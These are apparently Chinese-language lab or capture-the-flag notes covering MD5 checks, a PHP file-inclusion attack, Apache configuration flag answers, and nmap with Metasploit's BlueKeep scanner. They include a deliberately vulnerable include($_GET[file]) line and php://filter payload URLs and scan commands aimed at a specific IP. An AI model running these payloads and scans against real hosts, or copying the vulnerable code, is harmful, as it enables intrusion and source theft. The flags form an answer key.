信息安全
一、任务清单
- MD5 文件安全校验
- Web 应用程序文件包含安全攻防
- Apache 配置评估
- nmap 扫描渗透测试
二、DEMO
MD5是一种广泛使用的哈希算法,它将任意长度的数据转换为128位的固定长度的哈希值,并且不可逆转。
1
2
3
4
5
6
7
8
9
10
11
| md5sum test.txt
仅文件名改变时文件的md5值不会变
md5sum /etc/passwd
md5sum /etc/passwd > passwd.md5
undo useradd user06
sudo passwd user06
sudo md5sum /etc/passwd
sudo cat passwd.md5
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| 在页面中找出<input>标签,在其属性中找出name=“变量名”
<?php
include($_GET[file]);
?>
http://121.43.48.126/index.php?file=php://filter/read=convert.base64-encode/resource=./AppServ/Apache2.2/logs/flag.log
http://121.43.48.126/index.php?file=php://filter/read=convert.base64-encode/resource=index.php
<?php
$base64EncodedContent = "Base64 编码内容";
$decodedContent = base64_decode($base64EncodedContent);
echo $decodedContent;
?>
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
| 找到Apache的主配置文件httpd.conf,找出其中的Options指令
Options -Indexes
flag{-indexes}
找到Apache的主配置文件httpd.conf,找出其中的ErrorLog指令
/www/wwwlogs/error_log
flag{/www/wwwlogs/error_log}
找到Apache的主配置文件httpd.conf,找出其中的DirectoryIndex指令
flag{DirectoryIndex default.php index.php index.html}
找到Apache的主配置文件httpd.conf,找出其中的ErrorDocument指令
flag{ErrorDocument 404 /custom404.html}
找到Apache的主配置文件httpd.conf,找出其中的ServerTokens指令
flag{ServerTokens Prod}
找到Apache的主配置文件httpd.conf,找出其中的<Directory>指令块
flag{<Directory />Require ip 192.168.204.0/24</Directory>}
找到Apache的主配置文件httpd.conf,找出或输入其中的LimitRequestBody指令
flag{LimitRequestBody 51200}
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
| nmap -sV -oX output.xml 121.43.48.126
msfdb init
msfconsole
db_import output.xml
hosts
services
msfconsole
search CVE-2019-0708
msfconsole
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set RHOSTS 121.43.48.126
run
|
